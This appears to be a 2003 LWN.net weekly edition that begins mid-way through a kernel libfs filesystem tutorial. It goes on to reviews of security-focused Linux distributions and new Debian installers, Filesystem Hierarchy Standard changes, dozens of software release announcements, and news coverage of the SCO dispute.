Once the call to simple_fill_super() returns, the work is done and your filesystem is live. The only remaining detail might be in your open() method; if you have multiple files sharing the same file_operations structure, you will need to figure out which one is actually being acted upon. The key here is the inode number, which can be found in the i_ino field. The modified version of lfs_open() finds the right counter as follows:
static int lfs_open(struct inode *inode, struct file *filp)
{
if (inode->i_ino > NCOUNTERS)
return -ENODEV; /* Should never happen. */
filp->private_data = counters + inode->i_ino - 1;
return 0;
}
The read() and write() functions use the private_data field, and thus need not be modified from the previous version.
Conclusion
The libfs code, as demonstrated here, is sufficient for a wide variety of driver-specific virtual filesystems. Further examples can be found in the 2.5 kernel source in a few places:- drivers/hotplug/pci_hotplug_core.c
- drivers/usb/core/inode.c
- drivers/oprofile/oprofilefs.c
- fs/ramfs/inode.c
- fs/nfsd/nfsctl.c (simple_fill_super() example)
...and in a few other spots – grep is your friend.
Keep in mind that the 2.6 driver model code makes it easy for drivers to export information within its own virtual filesystem; for many applications, that will be the preferred way of making information available to user space. The Driver Porting Series has several articles on the driver model and sysfs. For cases where only a custom filesystem will do, however, libfs makes the task (relatively) easy.
Patches and updates
Kernel trees
Core kernel code
Development tools
Device drivers
Filesystems and block I/O
Security-related
Miscellaneous
Page editor: Jonathan Corbet
Distributions
News and Editorials
New 1.0 Releases: OpenNA Linux, Gibraltar Firewall, Devil-Linux
Three distributions have reached their 1.0 releases over the last two weeks - OpenNA Linux, Gibraltar Firewall and Devil-Linux. Despite the version number, none of these three are new projects as all of them have been in development for over a year. OpenNA Linux is a Red Hat-based secure distribution for servers, while the Debian-based Gibraltar Firewall and independently developed Devil-Linux are live firewalls running directly from bootable CDs.OpenNA Linux 1.0
OpenNA Linux is a product of Canada's OpenNA Incorporated. It is a Linux distribution, originally based on Red Hat Linux, designed for servers and with emphasis on strong security. This is achieved by patching its Linux 2.4.22 kernel with the GRSecurity patch to protect against buffer overflow exploits, with all server services made to run in chroot jail environment mode and other security features. The installation program allows the user to choose from a selection of pre-defined server classes, depending on the server's purpose, with all unneeded services turned off by default. For those who intend to install and test drive OpenNA Linux, beware that it cannot be installed on a pre-selected partition - the OS takes over the entire first hard disk.
If you are wondering about the developers' authority on security matters, then you can rest assured that you are in a company of experts. Besides the OpenNA distribution, the company also produces an authoritative, 1200-page technical book entitled Securing & Optimizing Linux: The Hacking Solution. The book is written for system administrators and security-conscious users who wish to protect their Linux systems from unauthorized intrusions and other external attacks. All this expertise, together with a well-designed web site makes OpenNA Linux a serious contender for those who are looking for a secure and optimized Linux distribution for their mission critical servers. Although OpenNA Linux is available for free download, the developers would appreciate your purchase of a supported boxed edition for $47.95, with a 30-day email support and documentation.
Gibraltar Firewall 1.0
Gibraltar Firewall, in development
since 1999, is a product of eSYS Informationssysteme GmbH in Austria. The
Debian-based firewall runs directly from a bootable CD without any need for
hard disk installation. One distinguishing feature of Gibraltar from other
similar products is a Webmin-like web-based configuration utility called
GibADMIN. "Gibraltar can be configured using a clear and intuitive web
client called GibADMIN; Linux specific know-how is no longer
required.
", claims the Gibraltar product overview
page. The firewall comes with kernel 2.4.22, IPSec, SSL wrapper,
powerful packet filtering ability based on various criteria, Postfix mail
server with SpamAssassin and many other server applications.
Gibraltar Firewall comes in two editions - a full-featured commercial edition (€990) and a free edition with disabled GibADMIN (except for a 30-day trial period, license for which can be obtained separately). This won't be a problem for expert Linux users who can configure the firewall directly from the command line, or remotely via an SSH connection. A comprehensive 72-page user manual with further links to user contributed tutorials are listed on the product documentation page, while a fairly active mailing lists in English and German can provide further help, if necessary.
Devil-Linux 1.0
Devil-Linux is an independently developed Linux-based firewall on a live CD with the ability to save configuration settings on a floppy disk or a USB pen drive. It was created by Heiko Zuerker, an IT manager in North Carolina, in 2001. One interesting feature of Devil-Linux is that, besides the live CD ISO image, the developers also provide a "build system", which enables building of custom editions of Devil-Linux with extra software not included on the original CD. When the custom system is compiled and ready, it can be burned onto a bootable CD and used the same way as an unmodified Devil-Linux. The Devil-Linux documentation provides detailed information about this and other aspects of the distribution.
Unlike Gibraltar, Devil-Linux is a non-commercial project. It can be used not only as a firewall, but also as a router, gateway or a general purpose server. Based on kernel 2.4.22 with the GRSecurity patch, it includes most server software, such as BIND, DHCP, Apache, MySQL, Postfix, Samba, OpenLDAP, Squid, as well as IPSec. Two recent reviews of the product can be found at Kalamazoo LUG and NewsForge, and an older interview with Heiko Zuerker at PortaZero. Despite its lighthearted name, Devil-Linux is a serious project with strong security as its utmost priority.
Two new Debian installers
There are quite a few accolades heaped on the Debian GNU/Linux distribution, but "it has a great installer" is rarely one of them. While the current installer has its defenders, many users find it to be arcane and difficult -- particularly those who are new to Linux. The point that one only need install Debian once is well-taken, but the first attempt often befuddles new users to the point of abandoning Debian GNU/Linux before they can fully appreciate the strengths of the distribution.Now users have not one, but two new installers to look forward to in the near future. The Debian Project has been working on a new installation system for the "Sarge" release for some time. Joey Hess announced the first beta release of the installer on November 9 and called for users to help test the beta. Ian Murdock had also announced in October that Progeny has ported Red Hat's Anaconda to Debian. Progeny has also ceased work on several projects, PGI, autoinstall, gnome-tasksel and python-parted, in favor of Anaconda for Debian.
We decided we would take a look at the new installation methods to see what the Debian community would be using in the future. We downloaded the Beta 1 installer ISO with Debian base and put it to the test by installing Sarge. The new installer still doesn't come with all the bells and whistles, or fancy GUI, but it does include a welcome feature in the form of hardware detection. This will be a relief for users who are eager to try out Debian but lack any idea about which kernel module is required for their network card, and so on.
The first stage of the installer detects hardware and attempts to configure the network settings via DHCP. Users without a DHCP server handy can manually configure their network after DHCP fails. (Assuming they have a supported Ethernet card, of course.) The user is also able to complete the first-stage install without a network connection if necessary. Next the user is prompted to use cfdisk to partition their hard disk, then the installer allows the user to configure and mount partitions. After this, the base system will be installed and the system is rebooted. Upon system boot, the user works through base-config to configure their system.
According to the HOWTO, base-config is not considered part of the installer. However, we went ahead and looked at the entire procedure required to install Debian Sarge, which includes running through base-config.
Overall, we feel that the new installation procedure promises to be an improvement. However, the user is still expected to know much more about the distribution and hardware when installing Debian Sarge than if they install Fedora, SUSE, Mandrake or even Slackware. Users are asked to make a lot of decisions during the installation, and if unfamiliar with the terminology, they will undoubtedly be intimidated.
The base-config procedure does provide detailed help text for most options, but if they are not familiar with the concepts being presented they will likely have a difficult time making the necessary decisions. Even worse, it does not provide a way to go back and change options during configuration. For example, if a user forgets the distinction between the various Exim configuration options, they cannot cycle back to re-read the descriptions of Exim's default configurations.
Though Progeny's installer has not been publicly released yet, we contacted Ian Murdock of Progeny and received a current snapshot of their work with Anaconda as a Debian installer.
It is, to say the least, not quite ready for prime-time. Some of the features have not yet been implemented or do not work, including Ethernet card configuration and adding regular users. However, the pre-release we were given was enough to get the general feel for the installer. While the graphics have been changed, using Progeny's Anaconda for Debian is very much like installing Red Hat Linux 9 or Fedora. The GUI procedure is very simple and straightforward, and doesn't require much knowledge on the part of the user doing the install.
As exciting as Anaconda for Debian may be to some, Murdock's announcement of Progeny's port of Anaconda produced some friction on the debian-devel mailing list. Many on the list were concerned that Anaconda would detract from debian-installer work and delay the release of Sarge, or serve as a waste of resources when Progeny could have been working on debian-installer.
Murdock replied that it was not Progeny's intent to detract from work being done by the Debian Project:
Debian-installer is definitely an improvement, and it looks to be very stable. The entire Debian installation routine, including base-config, needs some work before it will be ready for less experienced Linux users. Progeny's Anaconda, once it is finished, looks as if it will be an attractive alternative for those who would like to run Debian on x86 systems, but lack the chops to get past a non-GUI installation that requires a great deal of knowledge about their system and Linux.
Distribution News
Debian GNU/Linux
The Debian Weekly News for November 11, 2003 covers the latest Netcraft report (Apache gains ground); Exec-Shield for Debian?; a clarification of DFSG Clause 1; and much more.The first beta release of the new debian-installer has been announced. Interested people are encouraged to try it out and help the developers find the remaining problems.
Debian has won several of the Linux Journal 2003 Readers' Choice awards, including "Favorite Distribution" and "Best Enterprise Distribution". Debian and Debian-based Knoppix received more than 60% of the votes.
The second revision of the current stable Debian distribution (woody) will probably be released soon. People are encouraged to check it out and make comments.
Gentoo Weekly Newsletter - Volume 2, Issue 45
The Gentoo Weekly Newsletter for the week of November 10, 2003 is now available, with a summary of the Gentoo Managers' Meeting, and more.Xandros Desktop 2.0 announced
Xandros has announced the forthcoming release of its Xandros Desktop 2.0. "With a strong user focus, Xandros Desktop 2.0 offers an intuitive, elegant, graphical environment that's easy to use, and installs with 4 clicks of a mouse." This distribution, which Xandros claims to be built on "Debian Linux 4.0", will be available on December 9.
New Distributions
BLAG Linux and GNU
From the announcement: "BLAG Linux And GNU by the Brixton Linux Action Group is an operating system. It comes with everything you need to get a computer up and running--it needs no other software. It has Internet, graphics, video, sound, office, security, file sharing, and more applications. It's fast, reliable, runs on older machines, and flies on fast boxes. You can install miniblag (the smallest install at less than 350 Megs), deskblag (includes a Gnome desktop with all the typical apps), serverblag (all the server daemons but no GUI) or get it all with blagblagblag." BLAG9000 is the current version.
Linux LiveCD Router
Linux LiveCD Router version 1.5 has been released under the GNU GPL. Click below for the announcement. Linux LiveCD is a small and simple LiveCD distribution aimed at broadband and wifi users. No installation or hard disk required.PLD Live CD
PLD Live CD is a bootable CD that contains a live Linux distribution based on the PLD Linux distribution. It uses squashfs transparent compression to fit huge amount of packages on a single CD, including OpenOffice, KDE, Gnome, WindowMaker, XFCE, and many more. It also includes a set of scripts for detecting hardware such SCSI and ISA devices, monitors, sound cards, and graphic cards. It also supports 'profiles' that let you store your settings on a floppy. PLD Live CD is currently at version 0.26.
Minor distribution updates
Beyond Linux From Scratch
Beyond Linux From Scratch (BLFS) has released v5.0 with major feature enhancements. "Changes: This is the first concurrent release with LFS-5.0. It features XFre86-4.3.0.1, KDE 3.1.4, GNOME 2.2.2, Apache 2.0.47, and OpenOffice 1.1.0 plus a wide variety of current libraries and support programs. The book's layout has also been improved from the previous release."
KNOPPIX
KNOPPIX has released v3.3-2003-11-03 with minor feature enhancements. "Changes: This version features a new background picture, the usual lot of updates, OpenOffice 1.1 (English and German), and KDE 3.1.4 (partly, some packages are still missing). It removes compressed changelogs for space reasons."
Onebase Linux
Onebase Linux version 2.0 has been announced. "OL has achieved a major breakthrough with version 2.0. This progress is result of the completely rewritten and new OLM framework. Not only the package management has become more powerful and flexible in this version but also it now makes Onebase both a source and/or binary distribution."
Pingwinek GNU/Linux
Pingwinek GNU/Linux has released v1.0rc0 with major feature enhancements. "Changes: A new installation process was implemented. The Live CD version now automatically detects hardware. GNOME 2.4 and the 2.6 Linux kernel are now used, and new software was included."
Sentinix
Sentinix has released v1.0 rc 01, the first beta release for this distribution, formerly known as Compledge Sentinel.Sentry Firewall
Sentry Firewall has released v1.5.0-rc6 with minor bugfixes. "Changes: snort, squid, Webmin, and dnsmasq were updated. The USB support in the kernel was also enhanced. The HOWTO was updated and a new documentation and reference guide were created to cover all other documentation not covered in the HOWTO."
TopologiLinux
TopologiLinux has released v4.0.0 with major feature enhancements. "Changes: This version is based on Slackware 9.1 and can be booted from your existing Windows boot manager."
TrinityOS
TrinityOS has released v11/08/03 with minor feature enhancements. "Changes: Various daemon versions were updated in the URL section. The thoughts about Redhat, Fedora, and SuSe in the distros section were updated. A Bash OCTAL math issue in the UPS graphing script was fixed."
Distribution reviews
Fedora at a Glance (Linux Journal)
Linux Journal takes a look at the Fedora Core 1 release. "In summary, there are some promising new features in Fedora and it is reassuring to see it has the stability and slick interface we've come to expect from Red Hat, but it is not quite as polished as some of the recent Red Hat releases. If you know Linux already and don't mind installing some extra packages and changing some settings, then it's for you. If you are new to Linux or want it to all work perfectly "out-of-the-box" with an automatic package resolver, you might be better off to wait for the next Fedora release."
Fedora Core 1 Review (LinuxElectrons)
LinuxElectrons reviews the Fedora Core 1 release. "The Linux community will benefit tremendously from Fedora. With RedHat's expertise and knowledge combined with a strong community we should expect nothing less than a high performance desktop. So far, this has been the case. IMHO, this is the perfect strategy for RedHat. They have been battling two extremes, the corporate server market versus the bleeding edge desktop users at retail. These two camps are at odds with one another, corporate wanting slow gradual changes and retail wanting the bleeding edge feature set. Fedora is the ultimate compromise and one community in which I'm a willing participant."
Page editor: Rebecca Sobol
Development
Updates to the File Hierarchy Standard
A new revision of the Filesystem Hierarchy Standard (FHS) (PDF) has been published by the Filesystem Hierarchy Group.
Through its history, those who built the various flavors of Unix have placed standard files in varying, system-specific locations. To a lesser degree, the same problem has also occurred with the numerous Linux distributions. Adherence to the FHS by Linux distribution architects has made life much easier for system administrators, end users, and software developers.
The FHS categorizes of files with two attributes, shareable/unshareable and static/variable. Standard directories are then categorized according to the attributes of the files within. In traditional UNIX implementations, directories often contained files and subdirectories with all of these attribute combinations. By strictly grouping the directory contents according to attributes, the sharing of common directories between systems, and the protection of site-specific data, is simplified.
This version of the standard proposes the creation of two new top-level directories, /srv and /media. The proposal for /srv defines the top-level directory as being used for data generated by users for the services the system offers. This would include, for example, ftp, www, and CVS repositories.
The /media proposal suggests the creation of a top-level directory which contains mount points for removable media such as:
/media/cdrom /media/cdrecorder /media/floppy /media/zip
The commonly used directory /mnt would then be restricted to use by the systems administrator for temporary mount points.
While the hammering out of such standards is likely to cause a lot of lively discussion, the benefits of filesystem standardization by the majority of Linux distributions is indeed great.
System Applications
Audio Projects
Speex 1.1.2 Released
Version 1.1.2 of Speex, an audio CODEC that's designed for speech, has been released. "This new unstable release improves on the fixed-point port started in 1.1.1. The port is not yet complete, but many modes are now usable in real-time on ARM processors."
Database Software
Firebird V1.5 RC7 builds are available
Version 1.5 RC7 of the Firebird database is available. "The development of Firebird 1.5 release is in final development stage! The Release Candidate means that we're "almost there", and we turned our focus to remaining known issues and rough edges, final testing and bug squashing. We made a lot of progress with it thanks to your feedback. The seventh Release Candidate should become the final release, so we are eager to hear about your experience (good or bad) with it."
PostgreSQL v7.4 RC2 is available
Version 7.4 RC2 of the PostgreSQL database is available. "As we are in the home stretch of a full release, we encourage as many as possible to test and report any bugs they can find, whether as part of the build process, or running in "real life" scenarios."
PostgreSQL Weekly News
The November 7, 2003 edition of the PostgreSQL Weekly News has been published. Take a look at the latest PostgreSQL database news and discussions.
Filesystem Utilities
ntfsprogs 1.8.0beta2 released (SourceForge)
Version 1.8.0beta2 of ntfsprogs, a set of utilities for ntfs filesystems, is available. "Changes in this release: Merge ntfs gnomevfs module by Jan Kratochvil. The Gnome virtual filesystem provides universal access to diffent filesystems. This modules enables Gnome VFS clients to seamlessly utilize the NTFS library."
Mail Software
Macho 0.4 released
Version 0.4 of Macho, a Common Lisp-based email web archiving system, is out. "This version provides several additions including message navigation hotkeys, per-archive custom style sheets, a thread context view, and more."
Peer to Peer
JXTA 2: A high-performance, massively scalable P2P network (IBM developerWorks)
Sing Li looks at JXTA 2 on IBM's developerWorks. "JXTA 2 is the second major release of the open source P2P network building substrate with a popular Java-based reference implementation. Significant design modifications have been introduced to create higher performance, massively scalable, and maintainable P2P networks. This article, which builds on Sing Li's JXTA series Making P2P interoperable, published two years ago, brings you up to date on the platform's major changes."
Printing
CUPS 1.1.20rc6 released
Version 1.1.20rc6 of CUPS, the Common Unix Print System, has been released. "CUPS 1.1.20 is primarily a bug fix and performance tuning release and includes fixes for 64-bit platforms, deadlock problems in the signal handling code, PDF printing issues, web interface issues, and various operating system-specific issues. The new release also adds new CUPS API functions for reading and writing files via HTTP, performing authentication, and controlling the required PPD conformance level."
Printing for the Impatient (O'ReillyNet)
Michael Lucas covers various Unix/Linux printing issues on O'Reilly. "Printing on a UNIX-like operating system has traditionally given headaches to even experienced sysadmins. The FreeBSD Handbook has a big section on how printers work, and it's well worth reading if you want to become intimate with the innards of printing. Personally, I don't want to struggle with identifying file types, input filters, and output filters; I want to plug in a printer and have the Magical Printer Pixies do all the work for me."
Web Site Development
AOLserver 4.0 GM released (SourceForge)
Version 4.0 GM of AOLserver has been announced. "AOLserver is a multithreaded, Tcl-enabled, massively-scalable and extensible web server tuned for large scale, dynamic web sites. AOLserver also includes complete database integration and a dynamic page scripting language."
Gallery v1.4.1 RC3 available (SourceForge)
Version 1.4.1 RC3 of Gallery, a web-based photo album management system, has been released. "New features for this 1.4.1 include voting/ranking of images, user self-registration, lost password reset, e-mail notifications, support for "skins" to customize Gallery's look and feel, a clearer and easier to follow Config. Wizard and tons of other small improvements and bugfixes."
Release of ht://Dig 3.2.0b5 (SourceForge)
Version 3.2.0b5 of ht://Dig, a web site search engine, has been announced. "After being asked "Is ht://Dig dead?" once too often, the ht://Dig group is very happy to announce the release of ht://Dig version 3.2.0b5. This fourth beta release of 3.2 (yes, 3.2.0b4 was cancelled) should fix all bugs in previous 3.2 releases and indtroduces a few new features. As a beta release, it has not received exhaustive testing. However, we believe it to be almost stable enough for production use, and hope that you consider giving it a try to provide feedback."
Mambo Open Source 4.5 Beta 1.0.3 Released (SourceForge)
Version 4.5 Beta 1.0.3 of Mambo Open Source, a dynamic web content management system, is available. The project's home page says: "In Mambo Open Source 4.5 Beta 1.0.3 we decided to start implementing Search Engine Friendly URL's (SEF). We did some initial work and now will need your help with testing and finding bugs."
more.groupware 0.7.0 released (SourceForge)
Version 0.7.0 of more.groupware, a PHP4-based web groupware suite, is out. "It fixes the webmail2 setup bug as well as a few other bugs in forum, files, tts. Additionally some new features have been added to calendar2 and webmail2 and some translation updates have been done."
Quixote 0.7a2 available
Version 0.7a2 of the Quixote web application framework is available. See the CHANGES file for information on what's new.Araneida 0.80 released
Version 0.80 of Araneida, a Common Lisp-based extensible web server, is available. "This version provides a new HTTP-LISTENER abstraction, cleaner raising of HTTP errors, support for the REFRESH header and a few fixes."
Using Common Lisp to Build Web Applications
Lisp aficionado Paolo Amoroso has passed us links to a couple of new articles to us concerning the KPAX web application system.
Miscellaneous
Linux-VServer 1.0 released
Version 1.0 of Linux-VServer is available. "VServer is a very cool project, a bit like UML but with a much better architecture for shared hosting environments. It was originally written by Jack Gelinas (of Linuxconf fame) and is now maintained by Herbert Pötzl."
Desktop Applications
Audio Applications
GNUsound 0.6.1 has been released
Version 0.6.1 of GNUsound, a sound editor, is available. "This is a maintenance release to fix a few critical bugs. I really wanted to skip this release and go straight for 0.7, but there's too much work to be done on that version still, and the 0.6 bugs are quite serious."
Rhythmbox 0.6.0: 'The Universe Is Finite' (GnomeDesktop)
Version 0.6.0 of Rhythmbox, an integrated music management application for GNOME, has been released. "The release name signifies the fact that there is actually in theory still a limit to the amount of music you can put in Rhythmbox's library, since you are bounded by the universe's finite size."
WaveSurfer 1.5.6 released
Version 1.5.6 of the WaveSurfer audio editing utility is available. See the Change History file for details.
Desktop Environments
CVSGnome 0.4.8 released (GnomeDesktop)
Version 0.4.8 of CVSGnome, a CVS build script for GNOME, is available. "Using this software, you can easily build GNOME either from tarballs or CVS HEAD. In addition, it features all major extra software available for GNOME, including the GIMP, Gnumeric, and many more."
KDE Traffic
Issue #67 of KDE Traffic is out. The KDE.News summary says: "with news regarding KMail, Kontact, general look and feel and more."
KDE-CVS-Digest
November 7, 2003 KDE-CVS-Digest is online. Here's the summary: "Bug fixes and more bug fixes. Umbrello, KDevelop, Quanta, Konsole, KOrganizer encoding, KSpread, Khtml, Juk, Kopete, Kgpg, KWin and kdeui all have a large number of bugs fixed. There were a few announcements this week. Of course the big one is the release of 3.2 beta1."
KDE Developer's Corner: Using KConfig XT
A new tutorial on KConfig XT has been announced. "As some of you may know, KDE 3.2 will introduce a heavily improved configuration framework, known as KConfig XT. This new framework extends, not deprecates our current configuration API. To help developers understand KConfig XT I have created a short tutorial (ps, kwd) available on developer.kde.org." The tutorial is available here.
PyKDE API Forges Ahead with Plugin Support (KDE.News)
KDE.News looks at the latest release of PyKDE, the Python bindings for the KDE. "The latest release of PyKDE (3.8.0) includes the ability to write KDE panel applets completely in Python -- absolutely no C++ required. This is the first in what's planned to be a number of extensions for PyKDE that allow plugins and related objects to be created entirely in Python; David Boddie is nearing release of modules for authoring KParts for export (PyKDE already imports KParts), KDE Control Center modules, and IOSlaves."
gDesklets 0.24.1 released (GnomeDesktop)
If you find your screen to be too boring, GnomeDesktop.org reports on the availability of version 0.24.1 of the gDesktops desktop candy package.XFce Goodies
New Goodies are available for the XFce desktop environment. Some of the Goodies include monitors for system load, battery state, net load, a clipboard, a calendar, and more.Translucent X screenshots
The Freedesktop.org X Server Project has posted some screen shots showing off the new translucent windows feature. Have a look for some serious eye candy. (Seen on FootNotes).
Electronics
XCircuit 3.1.26 released
Version 3.1.26 of XCircuit, an electronic schematic editing package, is out. Change information is in the source code.
Financial Applications
GNUe Traffic
Two new copies of GNUe Traffic are available this week, see Issue #98, dated November 3, and Issue #99, dated November 10 for the latest news from the GNU Enterprise project.
Games
Boson 0.9 finally released!
Version 0.9 of Boson, a real-time strategy game for KDE, is out. See the announcement for change information.GBA Programming with DevKit Advance (O'ReillyNet)
Howard Wen looks at DevKit Advance on O'Reilly. "People interested in making their own games for the Nintendo Gameboy Advance will find the unofficial Gameboy Advance (GBA) software development kit (SDK) indispensable. Based on the GNU Compiler Collection (GCC), DevKit Advance runs on Windows, Linux, and Mac OS X; it comes compiled with the Socrates Gameboy Advance Development Environment (SGADE), a library of generic code for the GBA platform released under an open source license. The rest of the DevKit Advance code is released under the GNU General Public License."
Graphics
Imview 1.0.1 and 1.1.2 released
Versions 1.0.1 and 1.1.2 (unstable) of Imview, an image viewing and analysis application, have been released.Inkscape project formed (GnomeDesktop)
GnomeDesktop.org covers the Inkscape project, which aims to create an SVG-compliant vector graphics editor. "Bryce Harrington wrote: Nathan, mental, Ted and myself have decided to embark on our own direction with the Sodipodi codebase. We have attempted to do this as part of the Sodipodi project, but we believe we need to try out a new project structure to have the freedom to be able to explore some approaches radically different from Sodipodi. We have recently reworked the Sodipodi codebase to build with a C++ compiler and renamed it 'Inkscape'."
Interoperability
Samba 3.0.1pre2 available for download
Samba 3.0.1pre2 has been released. "This is another preview release of the Samba 3.0.1 code base and is provided for testing only. This release is *not* intended for production servers. Use at your own risk. There have been several bug fixes since 3.0.0 that we feel are important to make available to the Samba community for wider testing."
Wine Traffic
Wine Traffic issue #195 has been published. Topics include: Wine for Crystallography, WineConf 2004, DirectX Games Tested, Copy Protection Sucks, and IPX Improvements.
Music Applications
Mammut 0.16 released
Version 0.16 of Mammut, an audio FFT tool, is out with some code cleanup and support for JACK.Marlin 0.2 released
Version 0.2 of Marlin, an audio sample editor for GNOME, is available. Also, see this report on GnomeDesktop.org for more information on Marlin.MusE version 0.6.2 is out
Version 0.6.2 of MusE, a MIDI/audio-based virtual studio, is out. "Release 0.6.2 has a large number of improvements and bugfixes, current users are encouraged to upgrade."
Web Browsers
Mozilla.org staff meeting minutes
The minutes from the mozilla.org staff meeting for October 27 and November 3, 2003 are online.Independent Status Reports (MozillaZine)
The Mozilla Independent Status Reports for November 9, 2003 are available.
Word Processors
AbiWord Weekly News
Issue #169 of the AbiWord Weekly News is out. Here's the summary: "Quite a bit of work on our two new features while also discussing massive sweeps of changes in the tree-layout, the stillness of SCO and um...what was it now? I know it was something you really would like, but I forgot. Oh, yeah, we were discussing AbiShow. This was a big week."
Miscellaneous
gFTP 2.0.16 has been released (GnomeDesktop)
Version 2.0.16 of the gFTP FTP client for GNOME has been announced. Lots of bug fixes are included.JFreeReport 0.8.4-5 released (SourceForge)
Version 0.8.4-5 of JFreeReport, a Java class library for generating reports, is available. "This is the next minor bugfix release of JFreeReport. Despite some bugfixes, the ext-package now contains the first demo on how to show JFreeCharts within a report."
LTI-Lib Beta release 1.9.7 (SourceForge)
SourceForge has an announcement for version 1.9.7 beta of LTI-Lib, a cross-platform C++ computer vision library. "This release provides new functors and features, many bug fixes and more documentation."
Languages and Tools
Caml
Caml Weekly News
The November 4-11, 2003 edition of the Caml Weekly News is out with the latest Caml language news and discussions.
Java
JGraphT 0.5.1 released (SourceForge)
Version 0.5.1 of JGraphT, a cross-platform Java class library that provides graph-theory objects and algorithms, has been announced. "The new version delivers accumulated developments, bug fixes and improvements."
JSP
JSP 2.0: The New Deal, Part 1 (O'Reilly)
Hans Bergsten explores JSP 2.0 on O'Reilly. "The wait is almost over: the latest version of the JavaServer Pages (JSP) specification, JSP 2.0, is about to be released, along with all of the other J2EE 1.4 specifications. The jump to a new major revision for this JSP version signifies that all of the pieces are now in place for using JSP in a new way: there's no need for Java in the pages, thanks to the new Expression Language (EL) and the JSP Standard Tag Library (JSTL), and reusing code is much easier, thanks to two new ways to develop custom actions."
Pascal
Free Pascal 1.9.0 released
Version 1.9.0, the first public beta for version 2.0 of Free Pascal, is available. See the project news page for a list of changes.
Perl
Perl 5.8.2 released (use Perl)
Version 5.8.2 of Perl has been released. "5.8.2 is being released to fix minor binary incompatibilities discovered between 5.8.1 and 5.8.0. 5.8.2 is fully binary compatible with 5.8.0, and wherever possible also binary compatible with 5.8.1. The release also provides other minor bugfixes, including several for ithreads."
Perl 5.6.2 RC1 is out (use Perl)
Perl 5.6.2 RC1 has been announced. "Following shortly a new release on the 5.8 maintenance track, here is an updated version of Perl 5.6. Its purpose is to fix the build issues that appeared since Perl 5.6.1 was released, due to new compilers and systems. A few modules were updated as well."
This Week on perl5-porters (use Perl)
The November 3-9, 2003 edition of This Week on perl5-porters has been published. "This week was undoubtedly a maintenance-oriented week, as it has seen the release of perl 5.8.2, and of perl 5.6.2 RC1. But of course and as usual this wasn't the only topic on the always active p5p list."
This week on Perl 6 (O'Reilly)
The November 2, 2003 edition of This week on Perl 6 has been published. Take a look to learn about Perl 6 internals.Bringing Java into Perl (O'Reilly)
Phil Crow talks about executing Java from Perl on O'Reilly. "In this article, I will show how to bring Java code into a Perl program with Inline::Java. I won't probe the internals of Inline or Inline::Java, but I will tell you what you need to make a Java class available in a program or module. The program/module distinction is important only in one small piece of syntax, which I will point out."
PHP
mnoGoSearch-php-3.2.3 and mnoGoSearch-php-extension-1.83
New versions of the PHP frontend and extension for the mnoGoSearch web site search engine are available.
Python
Understanding Network I/O: From Spectator to Participant (O'ReillyNet)
George Belotsky illustrates the writing of a Python-based network client on O'Reilly. "This article focuses on Internet clients. Clients like your web browser request information from servers (like the one from which you accessed this page). Typically, the client then presents the information to a person, although there are clients that talk to other computer programs instead. The next article will present ideas that are also applicable to developing servers and peer-to-peer systems."
Dr. Dobb's Python-URL!
The Dr. Dobb's Python-URL! for November 10, 2003 is online with another round of links to Python language articles.
Scheme
Scheme Weekly News
The November 10, 2003 edition of the Scheme Weekly News is out with the latest Scheme language development information.
Tcl/Tk
Dr. Dobb's Tcl-URL!
The November 10, 2003 Dr. Dobb's Tcl-URL! is out with links to the latest Tcl/Tk news and articles.
XML
XML style guidelines for leveraging schema validators
Erik Ostermueller discusses XML Schema validation on IBM's developerWorks. "Used correctly, XML Schema validation can dramatically reduce the effort necessary to perform basic data validation tasks. Additionally, validation rules that are centrally located in an XML schema can help users to better understand your system. It takes the right XML structure, however, to leverage a schema validator. This article discusses proper XML structure as well as best and worst practices for defining data validation rules in XML Schema."
The Long, Long Arm of SGML (O'Reilly)
Kendall Grant Clark examines the legacy effects of SGML on XML. "Some significant percentage of the pain suffered by the XML development community over the past 5 years is directly attributable to dealing with the legacy of SGML. It has, in other words, turned out to be much harder, much more complex to do "SGML on the Web" than many people thought it would be. A considerable amount of the early traction seized by XML was due to the confluence of two forces: first, the technical maturity of SGML; second, the early to middle years of exuberance about the Web itself."
Editors
DocBook Menu for Emacs v0.90 released (SourceForge)
Version 0.90 of DocBook Menu for Emacs has been announced on SourceForge. "This is the initial release of a package for GNU Emacs 21.x or 20.x) that adds a hierarchical, customizable DocBook menu to your Emacs menubar. The menu is designed to provide quick and easy direct access, from within Emacs, to a variety of DocBook documentation and to the DocBook XSLT stylesheets."
IDEs
Anjuta 1.1.98 released (SourceForge)
Version 1.1.98 of Anjuta, an IDE for C/C++ under GNOME/GTK, is available. "Features include project management, application wizards, an onboard interactive debugger, and a powerful source editor with browsing and syntax highlighting."
Treebeard version 0.8.5 released (SourceForge)
Version 0.8.5 of Treebeard, a cross-platform XSLT IDE, has been released. "It's editor allows the loading and editing of an XML document and an XSLT document at the same time. It can apply the XSLT to the XML and display the output for further editing / saving in XML, HTML or PDF."
Miscellaneous
SCons 0.94 released
Version 0.94 of SCons, a software build tool that replaces Make, has been released.
Page editor: Forrest Cook
Linux in the news
Recommended Reading
The Grinch Who Stole Linux
On Groklaw: "The Grinch Who Stole Linux":
Now, please don't ask why. No one quite knows the reason.
It could be that their heads weren't screwed on quite right.
It could be, perhaps, that their shoes were too tight.
But I think that the most likely reason of all
May have been that their bank account was two sizes too small.
Holding Up Hollywood (Forbes)
Here's a Forbes article (via Yahoo, since Forbes.com requires registration now) stating that SCO is planning to target film studios which are using Linux. "So what if the studios tell SCO to take a hike? `We're going to force people down a path,' McBride says. `They can choose licensing or litigation. If someone says they want to see a court ruling before they pay, we'll say, Fine, you're the lucky winner. We'll take you first. I'd be surprised if we make it to the end of the year without filing a lawsuit.'"
Microsoft prepares security assault on Linux (InfoWorld)
InfoWorld reports that Microsoft has a new anti-Linux campaign in the works; this one will, somehow, try to claim that Microsoft is better at fixing security problems. "In a sign that the inroads made by the Open Source community are starting to rattle the software giant, Microsoft has hired several analysts to review how fast holes are patched in the open source software and is expected to announce that Windows compares favorably."
Trade Shows and Conferences
Yet Another Rendition of Linux (Wired)
Wired reports from the Desktop Linux Conference, where Bruce Perens has announced backing for a new, desktop-oriented version of the Debian distribution. "The companies supporting UserLinux will also contribute developers to the project. In return, they'll get an operating system with unlimited seats and options for paid technical support, ideally, from a variety of competing service providers. UserLinux should be available in six months, and discs containing a consumer version of UserLinux could hit retail store shelves shortly thereafter."
Desktop Linux Conference: KDE Report (KDE.News)
George Staikos reports on the KDE presence at the Desktop Linux Conference. "We still haven't educated people enough regarding FreeQt. People who should be well educated about these things were still trying to tell me that if Trolltech is acquired, KDE would end up being a proprietary platform."
The SCO Problem
SCO lawyers promised settlement payday (News.com)
